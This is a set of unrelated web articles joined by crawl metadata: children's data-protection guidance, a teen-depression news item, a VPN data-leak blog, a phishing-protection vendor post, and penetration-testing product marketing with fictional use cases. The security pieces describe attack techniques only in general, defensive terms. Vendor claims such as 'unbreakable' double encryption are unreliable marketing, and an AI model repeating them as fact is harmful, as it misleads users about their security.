- Given its position on the use of legitimate interests as a legal basis for processing, it is not surprising that the DPC opines that profiling and targeted behavioural advertising “will generally not satisfy this principle of zero interference with the best interests of a child.” In essence, profiling and marketing to children is a no-go zone unless it is clearly in the best interests of the child. It is difficult to see how that might be the case in most commercial environments.
- While some marketing can be consented to by children, the DPC suggests that “in any case where an organisation is considering directing marketing activities towards children, it should be extremely cautious about doing so.” For those under 18, the best interests of the child “remain paramount.” Organizations who decide to directly market to children should, the Fundamentals guide, be able to demonstrate how this is in the child’s best interest, irrespective of commercial interests. The DPC also refers to the International Chamber of Commerce, Advertising and Marketing Communications Code’s promotion that a child’s personal data should not be used to target marketing towards other family members, without parental consent.
- The Fundamentals follow the EDPB’s position that children are entitled to information about the processing of their data, irrespective of the legal basis for processing. Clear and plain language is of particular importance to make such information understandable to the child.
- “Knowing your Audience,” “Information in Every Instance,” and “Child-oriented Transparency” are Fundamentals 4, 5, and 6. They require child-specific protective measures tailored to various age ranges of child users or, in the alternative, a baseline set of information which is clear and simple enough for all users, regardless of age, to access and understand.
- Organizations are asked to use clear, simple language in explaining data protection to children, with non-textual measures such as cartoons, videos, images, icons or gamification recommended depending on user ages. Also recommended is the use of methods relevant to the service being offered, e.g. for a video sharing platform, a video may be the best way to communicate with child users. The Fundamentals recommend that information should be provided to children up front, should encourage them to be curious and cautious about their personal data, and encourage them to seek parental guidance.
- Further, the DPC guides that children should be able to interact easily with the organization if they have questions or are unsure about the information they receive. Examples include instant chat, a dedicated email address, or a privacy dashboard. The DPC also guides that providing explanations to children on settings switched off or denied to children by default, and warning boxes with explanations where a child tries to deactivate such settings, should, as a protective measure, be built in to the service.
While recognizing that there may be some tension between a child’s right to data protection and rights to freedom of expression and association, the DPC states that there should be no need for a tradeoff between empowering and protecting the child in the digital environment. A child’s best interests should be the guiding principle and should be assessed and analyzed with expert assistance, as appropriate. The DPC expects organizations to document these assessments in Data Protection Impact Assessments (DPIAs) tailored to different types of processing, having regard to the ages, capacities and developmental needs of users. Completing and documenting “thorough and meaningful” DPIAs is a “key act of compliance” and will be a factor in the DPC’s assessment of an organization’s overall GDPR compliance.
The DPC also suggests that organizations processing children’s data should consider doing a Child Rights Impact Assessment, using the UN Convention on the Rights of the Child to frame the assessment. This, according to the DPC, is “a powerful tool” for translating the best interests principle into practice.
The Fundamentals aim to fill in the implementation gaps left by some lofty, but unspecific, GDPR provisions. They give a clarity that will undoubtedly be useful not just to the organizations to which they are directed, primarily those processing millions of child users’ data, but also to litigators and courts. Moreover, they will inform the approach of the DPC in its regulatory remit and so will have strong persuasive effect.
While acknowledging that these organizations have discretion on how they comply with aspects of the GDPR, the DPC notes such discretion “does not imply an excuse for inertia, inaction or rejection” of the guidance provided in the Fundamentals. “The best interests of the child must ground the actions of all data controllers, and there must be a floor of protection below which no user, and in particular no child user, drops.”
The Fundamentals are now in place, having taken effect immediately upon publication on the 17th December 2021. | <urn:uuid:cbf92a94-9d34-4c7e-8b47-d89ba4f1d1cf> | CC-MAIN-2022-40 | https://www.insideprivacy.com/childrens-privacy/dpc-publishes-guidance-on-processing-childrens-personal-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00341.warc.gz | en | 0.930711 | 2,886 | 2.859375 | 3 |
The number of depressed teens and those with anxiety disorders is growing, and psychiatry experts are blaming sexting and online bullying for it.
Figures from the Priory Group, the country's largest organisation for mental health hospitals and clinics, show admissions for anxiety in teenagers has risen by 50 per cent in only four years, the Daily Mail reports.
Back in 2010, a total of 178 boys and girls aged 12 to 17 were admitted to one of its centres with severe depression or anxiety. In 2014, that number rose to 262. What’s even scarier is that the true number is likely even bigger, as there are hundreds of others on waiting lists who have been referred by GPs but have not yet been seen by a specialist.
Psychiatrists say sexting and online bullying are the main reasons behind this surge in depression and anxiety. Sexting is the act of sending sexually explicit messages, primarily between mobile phones; teens send these messages to their friends, who then comment.
They say some see it as a 'form of courtship' and the chance to be noticed by the opposite sex.
But the photos can provoke extremely unkind comments, particularly if unflattering images of someone are sent round behind their backs.
Then there are also sites such as Ask.fm, where people can ask anonymous questions of one another. The aforementioned site was blamed for the deaths of four teenagers back in 2012 and 2013. All of them were victims of online bullying, where other kids, under the protection of anonymity, bullied and harassed the teens to their deaths.
Raj Samani VP and CTO for McAfee EMEA, comments: "It’s very upsetting to see that sexting and online bullying are having such an impact on the number of depressed teens and those with anxiety disorders.
"Recent research from Intel Security (opens in new tab) also highlighted the risks for teens, revealing that 67 per cent of children in the UK were allowed to go online unsupervised last year, an increase of almost 15 per cent from the year before - clearly showing a disconnect between what parents think is happening online and what is going on in reality.
"With over a third (35 per cent) of children admitting to experiencing cyber bullying first-hand and 40 per cent confessing to having witnessed cyber-bullying over the last year, it is important that parents not only speak to their children about online safety, but have ongoing conversations, ensuring they keep abreast of the latest social networks, online trends and security measures, so they’re fully armed with not only the right safety technologies, but also the knowledge needed to provide parental guidance both on and offline.
"It’s also imperative that if parents are setting up social profiles for their children, they feel empowered to be able to set the right security and privacy settings for their family across all devices."
Image Credit: Luis Sarabia | <urn:uuid:c61dfe87-b57d-48ad-9fc1-0998d45809c7> | CC-MAIN-2022-40 | https://www.itproportal.com/2015/05/11/number-depressed-teens-rising-experts-blame-sexting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00541.warc.gz | en | 0.963262 | 597 | 2.578125 | 3 |
All commercial VPNs have been marketed as the best and most convenient pieces of technology for users looking to improve their privacy. VPN providers make bold affirmations, like, “we provide 100% Internet privacy protection, avoid tracking and monitoring, and even circumvent censorship and geo-restricted content.”
But what many people don’t know is that VPNs were initially created to extend private networks (LANs/WANs) to other geographies using the Internet — not really as privacy tools.
So, the word “Private” in Virtual Private Network could be the one stirring up the confusion.
In this post, we’ll demystify the popular VPN, as they are also vulnerable to security breaches and data leaks. Especially now, as more and more organizations are using enterprise VPNs as well. We’ll go through the most common ways VPNs leak data. The most obvious is when VPNs keep logs and sell (send) it somewhere. But VPNs may also fall victim to cyberattacks. If they don’t have strong encryption and the proper configuration, they’ll likely be hacked. Additionally, you’ll also learn how to avoid data leakage in any VPN.
VPNs also get hacked.
In August 2020, a hacker compiled a list of plain-text usernames, passwords, IP addresses, and other sensitive information from more than 900 enterprise Pulse Secure VPN servers, according to a ZDNet article. Of course, as a “good samaritan” black-hat hacker, he went on and published the list on a ransomware forum on the dark web.
Anyone with their hands on the list could use the information to gain remote access to internal corporate networks and make money by kidnapping sensitive data.
In another case, one of the most popular VPN services, NordVPN, was also the victim of a security breach. One of their servers in a data center in Finland was hacked in March 2018. NordVPN acknowledged the breach in October 2019 — more than a year later. Although the breach didn’t compromise any user information and was considered minor, customers’ Internet traffic was in the hands of a hacker and prone to a man-in-the-middle attack.
VPNs are vulnerable to cyberattacks, and should be used with caution.
The Misconfigured VPN Service
Pulse Secure VPN and NordVPN are not the only victims of attacks. Most VPN providers have had some form of minor-major attack that led to a data leak. For example, TorGuard and VikingVPN also suffered from a similar attack in Oct 2019 (one acknowledged and the other didn’t). Private Internet Access (PIA) VPN also had to face an IP address leak in its port forwarding feature in 2015.
When the VPN service, whether it’s a commercial VPN or enterprise VPN, gets hacked, the provider and its corporate customers will be affected. After all, what the hacker is really after, is either corporate’s or end user’s data.
How a Misconfigured VPN Leaks Data?
1. IPv6 and dual-stack networks are vulnerable to VPN data leaks. When users want to migrate to IPv6 but are still on an IPv4 network, they can use both versions of the IP protocol. According to a research paper from 2015, “A Glance through the VPN Looking Glass: IPv6 Leakage and DNS Hijacking in Commercial VPN clients,” almost all VPN service providers at that time (and still today) ignore the IPv6 routing table. So all IPv6 traffic bypasses the VPN gateway interface — that means no VPN tunnel for IPv6 traffic. Additionally, VPN services that only consider IPv4 will also ignore IPv6 DNS lookups and ultimately expose DNS information (a quick self-check is sketched after this list).
2. WebRTC data leaks. WebRTC (Web Real-Time Communication) is a protocol that gives most web browsers the capability to establish voice, video, and P2P communication without any add-ons. Unfortunately, WebRTC has inherent security flaws that affect web browsers, VPNs, and firewalls. When WebRTC wants to establish communication with a remote client via STUN (Session Traversal Utilities for NAT) servers, it looks up the local client’s IP address using the Interactive Connectivity Establishment (ICE) protocol. The ICE protocol finds and reveals the IPv6 address of the local client to the STUN server (regardless of being connected to a VPN). This vulnerability only happens with IPv6 because it uses the same IP for private and public networks.
3. Old and vulnerable VPN technologies. VPN protocols such as PPTP with MS-CHAPv2 can be easily broken with brute-force attacks. Even though PPTP is considered one of the weakest VPN protocols, many VPN providers are still using it. And even with stronger protocols, such as SSL-VPN, some providers are likely to leave security vulnerabilities in place. The UK’s National Cyber Security Centre published a document exposing Advanced Persistent Threat (APT) actors that pose a threat to SSL-VPN products from popular vendors Pulse Secure, Fortinet, and Palo Alto. With these vulnerabilities, hackers can retrieve any file, including sensitive authentication credential files, through Remote Code Execution (RCE).
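A quick way to spot the dual-stack leak described in point 1 is to compare the public IPv4 and IPv6 addresses the internet sees with the VPN connected and disconnected. The sketch below is one way to do that, assuming the requests library is installed and the public ipify endpoints are reachable:

```python
# Quick dual-stack leak check: compare the public IPv4 and IPv6 addresses
# seen with the VPN up against the ones seen with it down.
import requests

def public_ip(url: str) -> str:
    try:
        return requests.get(url, timeout=5).text.strip()
    except requests.RequestException:
        return "unreachable"

# api.ipify.org answers over IPv4, api6.ipify.org answers over IPv6.
ipv4 = public_ip("https://api.ipify.org")
ipv6 = public_ip("https://api6.ipify.org")

print(f"Public IPv4 seen by the internet: {ipv4}")
print(f"Public IPv6 seen by the internet: {ipv6}")
# If the IPv6 address still matches your ISP-assigned prefix while the VPN
# is connected, IPv6 traffic is bypassing the tunnel.
```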
Data Retention, Another Privacy Compromise
VPN data leaks do not only happen due to misconfigured protocols and encryption. There is also another bad practice followed by some VPN providers that compromises their customers’ privacy: data logging and retention.
Although enterprise VPN service providers would typically avoid logging and retaining customers’ data, there are cases where they are required by law to save logs. For example, the 5-EYES (FVEY) alliance is an intelligence/surveillance pact between five countries: the US, the UK, Canada, Australia, and New Zealand. Governments in countries like China, Russia, and Sweden also mandate that VPN providers with servers in those countries retain logs for six to ten months.
These countries have some level of mandatory data retention and search warrants to allow intelligence agencies (FBI, feds, police, copyrights, etc.) to push VPN providers to hand over logs from their customers. That would include traffic, IPs, geo-tracking, browsing cookies, and additional sensitive information.
Of course, free VPNs are out of the question — as they inevitably log traffic data and sell it for marketing purposes. Without some form of cash return, free VPN service providers wouldn’t exist. In fact, according to an article from the Verge, most of the free VPNs, especially for Android, leak data, and some of them don’t even use encryption!
How to Avoid Data Leakage from VPNs?
So now that you know the ins and outs of how VPNs leak data, let’s see what you can do to avoid data leakage. The first thing to remember is obviously (as pointed out before) to use VPNs to extend networks, not as privacy tools.
Also, follow these best practices and tips to avoid breaches of your data:
1. Avoid weak VPNs. Avoid VPNs that do not advertise their encryption mechanism, and avoid the ones that use the outdated PPTP protocol. You can also check whether your VPN traffic is encrypted with a packet sniffer such as Wireshark.
Professional VPNs are now using a military-grade encryption AES-256 and they will even provide double encryption, which is unbreakable. Another great feature to look for is Kill Switch, which immediately turns off the Internet when the VPN gets disconnected.
If you suspect a data leak, test the VPN with a packet sniffer such as Wireshark (not a VPN’s official tester). While connected to the VPN, you shouldn’t be able to find unencrypted DNS and IPv6 information (a do-it-yourself check is sketched after this list). To test WebRTC leaks, you can use the Browserleaks service.
2. Find out about a VPN’s reputation. VPNs are hackable, and most providers (including VPNs that cater to enterprise clients) have been breached some way or the other. Look around the web for news of any historical data leak regarding the VPN provider. If they took action immediately, created a fix, and announced publicly, that’s a positive thing. They want to build trust. And trust is the only thing that can save a VPN’s reputation.
Otherwise, if they concealed the breach, they are likely to do it again. You can run a test at Have I Been Pwned? to check if your personal data has been compromised in a data breach, by a VPN or any other cloud-based service.
3. Look for VPNs based in friendly data-jurisdiction countries. Considering the location of where the VPN provider is registered (as a business) may give you an idea about the data jurisdiction. Avoid VPN providers that are based on the 5-EYES, 9-EYES, or 14-EYES. Any country on the 14-EYES might force the VPN to hand over data logs, ultimately compromising your privacy — if that’s a concern for your organization.
Read through a VPN’s no-logs policy carefully to ensure that third-party authorities will not breach your data.
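For the do-it-yourself DNS check mentioned under the first tip, a short scapy sketch will print any plaintext DNS queries that escape the tunnel while the VPN is connected. It needs root/administrator privileges, and the interface name below is a placeholder you would replace with your own:

```python
# Minimal DNS-leak spot check with scapy (run as root/administrator).
# While the VPN is connected, plaintext DNS queries should NOT appear on
# the physical interface -- only encrypted traffic to the VPN gateway.
from scapy.all import sniff, DNSQR  # pip install scapy

PHYSICAL_IFACE = "eth0"  # adjust to your real network interface

def report(pkt):
    if pkt.haslayer(DNSQR):
        print("Plaintext DNS query leaked:", pkt[DNSQR].qname.decode())

# Capture 30 seconds of UDP port 53 traffic on the physical interface.
sniff(iface=PHYSICAL_IFACE, filter="udp port 53", prn=report, timeout=30)
```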
Data leaks are common across all kinds of VPNs — free, business, and enterprise VPNs have all been subject to some form of security breach. Of course, free VPNs will intentionally log your data and leak it to third parties. And depending on the jurisdiction where a business/enterprise VPN is headquartered, they might also be keeping your logs.
VPN service providers also leak data unintentionally. They are still relying on outdated technology vulnerable to data leakage, especially in dual-stack networks (IPv4 and IPv6). The VPN will encrypt IPv4, but fully expose IPv6 information, leading to DNS and WebRTC leaks.
To steer clear from VPN’s data leakage, look for VPNs with strong encryption and rich features. It is also critical to look into their history and reputation; have they had a breach before? Were they honest about it? And published the vulnerability+fix right away?
Looking for VPN alternatives? Check our VPN vs. Remote Access Solution.
We hope that this article was informative. Please leave any comments and suggestions below! | <urn:uuid:b2b43d56-8cc6-4db8-8f16-f9b1bc52b6b9> | CC-MAIN-2022-40 | https://en.cloudbric.com/blog/2020/09/virtual-private-network-data-leakage/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00541.warc.gz | en | 0.933739 | 2,175 | 2.734375 | 3 |
Email technology suffers from a bum rap. It is often dismissed as a cumbersome legacy program, designed for an era that predates modern services, and is regularly rumored to be dead. This rumor is completely wrong. Today, email is used extensively wherever communication is essential to normal business activity. The ‘open’ nature of the protocol is what makes it useful, but also insecure. To use the email system securely, it is now essential to adopt best security practices for protecting the mailing environment; these preventive measures keep email indispensable despite its openness. Believe it or not, even now (in 2019) internet criminals find it easy to carry out phishing attacks via the email communication system. Targeted individuals are manipulated through deception, resulting in compromised accounts and loss of data and money. Phishing attacks have become a moneymaking business for fraudsters, which makes adopting best security practices for awareness and protection more important than ever before.
Phishing Attacks – Topmost Email Attack
Targeted phishing attacks are not just fake support emails or password reset messages; they involve sophisticated social engineering tactics designed to extract money or information from targeted users. It is a con that knows no limits and has a low barrier to entry, with millions of potential marks as business ranks grow globally.
According to the FBI’s Internet Crime Report 2017, a BEC (Business Email Compromise) attack, a form of targeted phishing designed to defraud organizations, costs an average target over $43,000. In May 2018, the FBI updated its estimate, stating that over the previous five years such attacks had cost enterprises more than $12 billion. End users and enterprises should therefore be concerned that new cybercrimes originate daily and may result in data breaches at any time. The consequences of cyber attacks can be hard to imagine. Beyond the obvious problems of compromised credit card and social security numbers, exposed information can be used to gather more data and then gain easy entry into other potential targets through social-proof strategies. These knock-on consequences of information exposure incidents call for rapid remedial action and for the responsible staff to be alerted immediately.
Let’s Have a Closer Look at Email Security Threats
Listed below are some of the latest email security threats outlined in the X-Force report:
- Business Email Compromise – BEC attacks have grown in recent years. Also called whaling, this threat involves a hacker who impersonates a high-level official and tries to influence an employee or client to release money or sensitive information. For example, a fraudulent phone call in which the caller pretends to be a bank executive and tries to convince customers to hand over their credit card information.
- Malicious Links or Attachments – A malicious web link in an email message directs the receiver to a website where his or her tenant email ID and password will be harvested. The receiver assumes that he or she is on a legitimate website and responds to the information requested on the malicious site, when the reality is the opposite. This trusting mindset allows intruders to gain the information they want and do real damage to the company.
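One common tell of the credential-harvesting links described above is that the text displayed to the user and the real destination of the link do not match. The toy heuristic below is illustrative only (real secure email gateways use far more signals), and the domains in it are made up:

```python
# Toy phishing heuristic: flag anchors whose visible text looks like a URL
# on one domain while the actual href points somewhere else.
import re
from urllib.parse import urlparse

html_body = ('<a href="http://login.harvester.example.net/reset">'
             'https://portal.example-bank.com/reset</a>')

for href, text in re.findall(r'<a\s+href="([^"]+)"[^>]*>([^<]+)</a>', html_body):
    href_domain = urlparse(href).netloc
    shown = text.strip()
    if shown.startswith(("http://", "https://")):
        shown_domain = urlparse(shown).netloc
        if shown_domain and shown_domain != href_domain:
            print(f"Suspicious link: displays {shown_domain!r} "
                  f"but points to {href_domain!r}")
```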
Best Security Practices to Stay Safe From Phishing
There are many solutions; enterprises simply have to adopt them. If you only read this post without implementing the security standards, then reading this blog is a waste of time. Therefore, we strongly recommend that readers begin implementing and executing these best security practices right after reading and thoroughly understanding them.
- Make Use of MFA Method – Popular cloud service vendors now provide multi-factor authentication to their customers free of cost. Microsoft Office 365, Google Cloud Platform, Amazon Web Services and others offer an MFA option to clients at no extra charge. This means it is the responsibility of cloud users to activate MFA on their online accounts. It will protect people from cybercrimes caused by unauthorized account access (see the short sketch after this list).
- Plan for Regular Updates – Critical vulnerabilities like Heartbleed and Shellshock strike at the heart of internet-connected components. It is therefore important to plan software updates on a weekly or, better, daily basis. A weekly schedule is acceptable, but updating daily is more effective. At least one hour a day can usually be set aside to check for and apply the latest versions of the security applications used on your premises.
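To show what the MFA recommendation looks like under the hood, the sketch below uses the open-source pyotp library with a made-up shared secret to generate and verify the kind of time-based one-time password an authenticator app produces:

```python
import pyotp  # pip install pyotp

# Hypothetical base32 secret that would be shared with the user's
# authenticator app when MFA is first enrolled.
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

code = totp.now()                 # 6-digit code, changes every 30 seconds
print("Current one-time code:", code)
print("Verifies right now:   ", totp.verify(code))
```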
Hand the Headache to a CASB Solution Vendor
CASB solution vendors are the ones who serve their customers with cloud security as a service. Their business growth depends on the quality of the security practices and services they provide to organizational clients for safeguarding confidential records. One such well-known vendor is CloudCodes! It offers the comprehensive best security practices needed to protect customers’ businesses from phishing, ransomware, Heartbleed-style vulnerabilities, and more. The CloudCodes team also assures its enterprise clients that data will remain secure, even if they adopt BYOD technology on their premises.
A penetration test is the process of uncovering and exploiting security weaknesses in order to evaluate the security stance of an IT infrastructure. Using the techniques of a real attacker, pen testers intelligently determine risk and prioritize critical vulnerabilities for remediation.
Just as threat actors use tools to swiftly compromise an environment, pen testers use tools like Core Impact to streamline the process of gaining access by automating routine tasks so they can handle more dynamic issues. Additionally, such penetration testing tools can be used by security team members who may not have an extensive pen testing background, using them for tests that are easy to run, but essential to perform regularly, like validating vulnerability scans.
To better demonstrate how a pen testing solution like Core Impact can bolster your organization’s security, we have put together several use cases of the fictional Acme, Inc., which show how Core Impact allows security teams to safely and efficiently test your environment using the same strategies as today’s adversaries.
Use Case: Vulnerability Validation
Security Analyst Mary Jackson is in charge of running regular vulnerability scans of her organization’s environment. The scanner turns up multiple vulnerabilities, and Mary is unsure of which vulnerability to try and resolve first.
Vulnerability scanners are an excellent security tool that examine an environment and uncover vulnerabilities that may be putting an organization at risk. A vulnerability scan report may list the corresponding Common Vulnerabilities and Exposures (CVE) number with each vulnerability, which is a unique id number that is assigned to known vulnerabilities. CVEs are given a rating using the Common Vulnerability Scoring System (CVSS) to classify how severe these vulnerabilities are on a scale of 0-10.
However, scanners can uncover hundreds, or even thousands of vulnerabilities depending on the size of an IT environment, so there may be enough severe vulnerabilities that the scoring system doesn’t provide enough clarity on where to begin. Additionally, while this system may help give an idea of how much of a risk each vulnerability poses, it does not take context into account. While a vulnerability may be scored as a 10, it may not actually be posing as big of a risk to Acme because the vulnerability is on an isolated system that requires direct access. A vulnerability with a lower rating may actually have the potential to cause more damage based on its location and ability to be leveraged for further attacks.
Ultimately, vulnerability scanners are intended to provide a broad picture of your security posture, but more insight is needed to fully prioritize the list of vulnerabilities uncovered.
Mary could use a penetration testing tool like Core Impact to fully prioritize the list of vulnerabilities uncovered. Penetration tests can validate vulnerabilities by investigating whether or not a vulnerability can be used to gain access, and if so, how difficult that effort would be. The results of such a pen test would produce a list based on the risk the vulnerabilities pose to the organization’s specific infrastructure.
Core Impact integrates with numerous third-party scanners, like Frontline, Burp Suite, Nessus, and Qualys, directly importing their scan data to run an automated test for vulnerability validation. Core Impact will evaluate the scan's output and provide you with prioritized validation of your system's weaknesses.
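As a simplified illustration of why raw scores alone aren’t enough, the sketch below ranks hypothetical findings by CVSS and then re-ranks them once an “exploitable” flag from validation testing is added. The data and CVE identifiers are invented for the example, and this is not Core Impact’s actual format or API:

```python
# Hypothetical scanner findings: (CVE id, CVSS score, validated as exploitable?)
findings = [
    ("CVE-2021-0001", 9.8, False),  # critical score, but isolated host
    ("CVE-2021-0002", 7.5, True),   # exploitable and reachable from outside
    ("CVE-2021-0003", 6.1, True),
    ("CVE-2021-0004", 8.8, False),
]

by_score = sorted(findings, key=lambda f: f[1], reverse=True)
# Put anything proven exploitable first, then fall back to CVSS within groups.
by_validated_risk = sorted(findings, key=lambda f: (not f[2], -f[1]))

print("Ranked by CVSS alone:   ", [f[0] for f in by_score])
print("Ranked after validation:", [f[0] for f in by_validated_risk])
```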
Use Case: Automation
In order to extend their vulnerability management program, Acme would like to run penetration tests on a regular basis.
Oftentimes, organizations that look into building a penetration testing program assume they need to regularly use a third-party service or hire their own team of experienced testers. However, there has been an ongoing skills shortage in the field of cybersecurity that shows no sign of resolving anytime soon. In fact, according to the 2022 Pen Testing Report, 34% of respondents answered that lack of talent/skillset was why they did not run pen tests, and 36% of respondents said that hiring enough skilled personnel was one of their top pen testing challenges.
This can be an issue for both third-party and internal teams. Reputable, skilled, third-party pen testers can only run so many engagements, and may not be able to accommodate such a frequent cadence. Alternately, the organization’s budget may not be able to sustain hiring pen testing services for more routine tests. For internal teams, experienced testers may not be available for hire, and those that are often come with a high price tag.
Manual pen testing can also be quite lengthy and labor intensive. Even though teams and individual testers use penetration testing tools, they are often relying on mix of multiple open-source tools, which means switching back and forth between solutions and manually combining information for reporting.
Because of these time and budget constraints, organizations may, at most, only be running tests annually, which is typically not sufficient. An organization may add additional assets or upgrade existing ones throughout the year, and their security should not have to wait so long to be validated. Further, retesting, which involves rerunning the same tests as a previous pen testing session, is critical in order to verify that remediation efforts were successful.
An automated pen testing tool like Core Impact can easily streamline the penetration testing process. Firstly, Core Impact addresses the pen testing skills gap. While experienced pen tests will always be needed for complex engagements, not every test requires an expert.
Core Impact enables team members who don’t have a deep background in pen testing to be able to run basic, though vital, tests using Rapid Penetration Tests (RPTS). These step-by-step wizards safely guide a tester through exercises like network information gathering or privilege escalation. Even general tests that validate remediation can be straightforward and automated. This allows organizations to run tests more frequently while still maintaining efficiency, and without having to dramatically increase headcount.
Secondly, Core Impact’s centralization both reduces console fatigue and standardizes reporting. As a comprehensive tool that can test across multiple vectors, every phase of the penetration testing process can be executed and managed in one place. Additionally, Core Impact offers multiple integration and collaboration capabilities with tools like Plextrac, Metasploit, Burp Suite, and Cobalt Strike for further centralization. With all of this information in one place, reports can be automatically generated instead of manually combining them piecemeal from different tools.
Use Case: Compliance
Since Acme has its own retail business, they are required to adhere to the PCI DSS security standards.
Most organizations must adhere to some type of industry or government security regulation, like SOX, GDPR, HIPAA, or NIST. In this case, PCI DSS is administered by the Payment Card Industry Security Standards Council and focuses on moving all retailers (and other industries) who use credit/debit cards into stronger and more predictably tested security postures, which can dramatically reduce credit card fraud.
Not adhering to PCI DSS can result in multiple issues. Firstly, these requirements are intended to safeguard an organization from data breaches, so failing to meet these best practices dramatically increases the risk of a successful attack. In the short term, breaches can disrupt or halt productivity. In the long term, they can take a great deal of time and money to recover from. Additionally, it may permanently damage the reputation of a business, which can result in fewer sales, and diminished confidence from investors. Not only that, credit card companies may no longer want a contract with the organization, so the business can no longer accept those cards for any transaction. Liability issues may also have to be resolved in court.
Lastly, failure to comply can also result in serious fines ranging from thousands to millions of dollars. It’s also worth noting that part of PCI DSS, as well as many other regulations, is being able to prove compliance—those without thorough reporting or documentation may still end up failing an audit.
The PCI standards currently consist of 12 main requirements, and over 200 sub-requirements. Requirement 11.3 mandates the development and implementation of “a methodology for penetration testing that includes external and internal penetration testing at least annually and after any upgrade or modification.”
Luckily, penetration testing can kill two birds with one stone. If a penetration test has proper reporting, it can not only show that a pen test was conducted, but can also prove compliance to other requirements or sub-requirements. In fact, 99% of those surveyed for the 2021 Penetration Testing Report said they used pen testing to maintain and demonstrate compliance for at least one regulation, such as SOX, HIPAA, or GDPR.
These regulations aim to protect sensitive data that is valuable to attackers, which can include customer or patient information, financial records, or even employee files. Periodic mandated testing ensures organizations stay compliant by uncovering and fixing security weaknesses that may be putting this data at risk. Additionally, for auditors, these tests can also verify that other mandated security measures are in place or working properly.
A penetration testing tool can make adherence to any regulation simple to implement, minimally disruptive, and budget-conscious. Core Impact provides an easy to follow and automated framework that can run internal and external tests, and also doesn’t require the security team to have extensive pen testing experience. Additionally, Core Impact’s automated reporting features ensure consistency and increase efficiency, creating a thorough record for all aspects of a pen testing engagement.
Use Case: Infrastructure Upgrade Validation
As Acme continues to grow and evolve, the IT environment must do the same. Consequently, additional servers are added, new solutions are added to the tool stack, and existing tools are upgraded to the latest versions.
Despite all efforts to create and distribute a secure product, there are countless software (and even some hardware) releases that contain vulnerabilities. So while upgrades and new assets bring exciting new capabilities and features, they also bring in the potential to become attack vectors for malicious actors seeking to gain access. Depending on the severity of the vulnerability, a threat actor could gain access to credentials, escalate privileges, or even take control of the root account.
Once vulnerabilities have been discovered, advisories are typically released with details on workaround patches, or other ways to mitigate risk. If an organization hasn’t run a pen test after adding new assets, they may not be aware of how much of a risk it poses to their organization, or may not even know the vulnerability exists in their environment. Even when patches exist and are applied, they may not have been implemented correctly, leaving the vulnerability intact.
As an organization’s infrastructure changes, either through upgrades or adding additional assets, it’s critical to pen test regularly. A single pen test serves as a baseline. An integral part of pen testing strategies is to retest frequently against that baseline. Retesting helps ensure that security holes have been closed when remediation efforts have been made, and can uncover new weaknesses that may be present in new assets or updates.
A pen testing tool like Core Impact can help to enable and streamline the retesting process. Organizations without a distinct internal team may rely entirely on third-party services, which they may only be able to enlist once a year. Having a pen testing tool allows any organization to run basic, routine tests, like validating vulnerability scans. These simple tests can be all that’s needed to determine whether any new vulnerabilities are present.
Core Impact has a certified library of exploits that is kept up to date to test against the latest vulnerabilities. Additionally, Core Impact can save testing sessions when they are initially run, logging what attack paths were used. These tests can then be automatically rerun at a later time for remediation validation. Comparing reports from both tests can also show if any new vulnerabilities have been uncovered as well as revealing if patches were correctly applied and functioning.
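To show what the comparison between a baseline test and a retest boils down to, here is a deliberately simple, hypothetical Python sketch. Real tools track findings with much richer identifiers than a (host, issue) pair, but the set arithmetic captures the idea of seeing what was remediated, what is still open, and what is new.

```python
# Findings are identified here by (host, issue) pairs; the data is invented.
baseline = {
    ("10.0.0.8", "SQL injection in login form"),
    ("10.0.0.9", "Default admin credentials"),
}
retest = {
    ("10.0.0.9", "Default admin credentials"),       # patch not applied correctly
    ("10.0.0.12", "Exposed management interface"),    # new asset, new weakness
}

print("Remediated since baseline:", baseline - retest)
print("Still open:", baseline & retest)
print("New since baseline:", retest - baseline)
```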
Use Case: Increasing Workforce Awareness
Acme Inc. recently experienced several small breaches. While tools in their security stack detected and prevented these breaches from doing significant damage, security analyst Annie Easley is still concerned about where these breaches originated. Upon analysis, it is discovered that several employees received emails that they thought were from customers, and opened an attachment, not knowing it held a suspicious payload. Annie wants to know how aware the rest of the employees are of such dangers.
Software vulnerabilities can be patched and misconfigurations can be corrected, but there is no closing an organization’s biggest security hole—its employees. Though phishing is an old technique, it is still an effective one that attackers regularly rely upon to solicit sensitive information or directly breach a system.
While spam filters can block out a portion of phishing emails, the ones they catch are typically the most basic and easily recognized. Many others can still slip through, particularly spear phishing emails, which are tailored to an individual or organization. These are much more sophisticated, and can either realistically imitate an official business or appear to come from an individual the recipient knows.
Administrators may be able to put more powerful blockers in place or enable notifications for external email addresses in the company email service. However, employees still regularly check personal email from their workstations, and in the case of remote work, personal computers sharing a Wi-Fi router with a work computer can be inadvertently connected to the network.
Victims of phishing attacks may never realize that they were the ones to open the doorway to a breach. Without that awareness, they may very well open another phishing email without thinking twice.
Using a pen testing tool like Core Impact would enable Annie to run sophisticated simulated phishing campaigns. These campaigns are designed to give an organization data on how vulnerable it is to such attacks.
Using Core Impact’s phishing capabilities, Annie could harvest email addresses that are visible from the Internet as well as the organizational intranet. Phish can then be designed to appear as authentic as needed. If opened, these phishing simulations can launch network pen tests to show how much access could be attained, demonstrating just how dangerous a phishing attack can be. At the conclusion of each test, Core Impact generates a list of who opened these emails, providing insight into who is most susceptible to these types of attacks.
From there, this data can be used to design and implement effective instruction and training, teaching employees vigilance and techniques for recognizing and reporting phishing attacks. Additionally, running phishing simulations before and after training, or making it a regular practice in general, can provide valuable data about how successful these education efforts are.
Use Case: Advanced Threats
With more incidents of severe attacks in the news, Acme’s concern about stealthy attacks grows. Could a seemingly minor threat vector serve as an entry point for an attacker to linger within the environment for a long period of time, allowing them to slowly work their way into more critical areas of the IT infrastructure to steal valuable data or severely disrupt operations?
Most cyber-attacks take a “hit-and-run” approach, using methods like DDoS or malware to achieve the simple goal of a single-step breach. However, there are an increasing number of complex advanced threats that target high-value objectives.
